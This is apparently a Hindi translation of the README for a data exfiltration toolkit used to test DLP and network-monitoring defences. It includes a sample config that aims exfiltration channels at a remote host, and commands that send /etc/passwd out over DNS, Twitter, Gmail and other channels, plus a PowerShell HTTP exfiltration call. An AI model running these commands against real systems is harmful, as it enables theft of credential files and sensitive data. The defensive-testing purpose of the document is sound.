
(विस्तारणीय) Data Exfiltration Toolkit (DET)
DET (जैसा है वैसा प्रदान किया जाता है), एक प्रूफ ऑफ कॉन्सेप्ट है जो एक साथ एकल या एकाधिक चैनल(चैनलों) का उपयोग करके डेटा एक्सफिल्ट्रेशन करने के लिए है।
यह एक प्रूफ ऑफ कॉन्सेप्ट है जिसका उद्देश्य संभावित DLP विफलताओं की पहचान करना है। इसका उपयोग संवेदनशील/लाइव डेटा (जैसे किसी मूल्यांकन पर) को एक्सफिल्ट्रेट करने के लिए कभी नहीं किया जाना चाहिए
विचार एक सामान्य टूलकिट बनाने का था जो किसी भी प्रकार के प्रोटोकॉल/सेवा को प्लग कर सके ताकि नेटवर्क मॉनिटरिंग और डेटा लीकेज प्रिवेंशन (DLP) समाधानों के कॉन्फ़िगरेशन का विभिन्न डेटा एक्सफिल्ट्रेशन तकनीकों के विरुद्ध परीक्षण किया जा सके।
प्राथमिक रिपॉजिटरी अब यहां स्थानांतरित हो गई है।
DET को BSides Ljubljana में 9 मार्च 2016 को प्रस्तुत किया गया था और स्लाइड्स यहां उपलब्ध होंगी। स्लाइड्स यहां उपलब्ध हैं।
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/sensepost/DET.git
फिर:
pip install -r requirements.txt --user
DET का उपयोग करने के लिए, आपको इसे कॉन्फ़िगर करना होगा और अपनी उचित सेटिंग्स (जैसे SMTP/IMAP, AES256 एन्क्रिप्शन पासफ्रेज़ आदि) जोड़नी होंगी। एक कॉन्फ़िगरेशन उदाहरण फ़ाइल प्रदान की गई है और इसका नाम है: config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
प्रत्येक प्लगइन लोड करने के लिए:
python det.py -L -c ./config.json
केवल twitter और gmail मॉड्यूल लोड करने के लिए:
python det.py -L -c ./config.json -p twitter,gmail
सभी प्लगइन लोड करने और DNS को बाहर करने के लिए:
python det.py -L -c ./config.json -e dns
प्रत्येक प्लगइन लोड करने के लिए:
python det.py -c ./config.json -f /etc/passwd
केवल twitter और gmail मॉड्यूल लोड करने के लिए:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
सभी प्लगइन लोड करने और DNS को बाहर करने के लिए:
python det.py -c ./config.json -e dns -f /etc/passwd
और PowerShell (HTTP मॉड्यूल) में:
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
अब तक, DET कई प्रोटोकॉल का समर्थन करता है, जिन्हें यहां सूचीबद्ध किया गया है:
और अन्य "सेवाएँ":
अब तक, मैं नए मॉड्यूल लागू करने में व्यस्त हूं जो लगभग शिप करने के लिए तैयार हैं, जिनमें शामिल हैं:
कुछ बहुत अच्छे संदर्भ/श्रेय उन लोगों को जिनसे मैंने उनके प्रोजेक्ट से प्रेरणा ली:
आप मुझसे ट्विटर पर @PaulWebSec पर संपर्क कर सकते हैं। यदि आप योगदान देना चाहते हैं, क्लोन करना, फोर्क करना, अपना PR सबमिट करना आदि, तो बेझिझक करें।
DET MIT लाइसेंस के तहत लाइसेंस प्राप्त है। इस लाइसेंस के दायरे से परे अनुमतियाँ [email protected] पर उपलब्ध हो सकती हैं।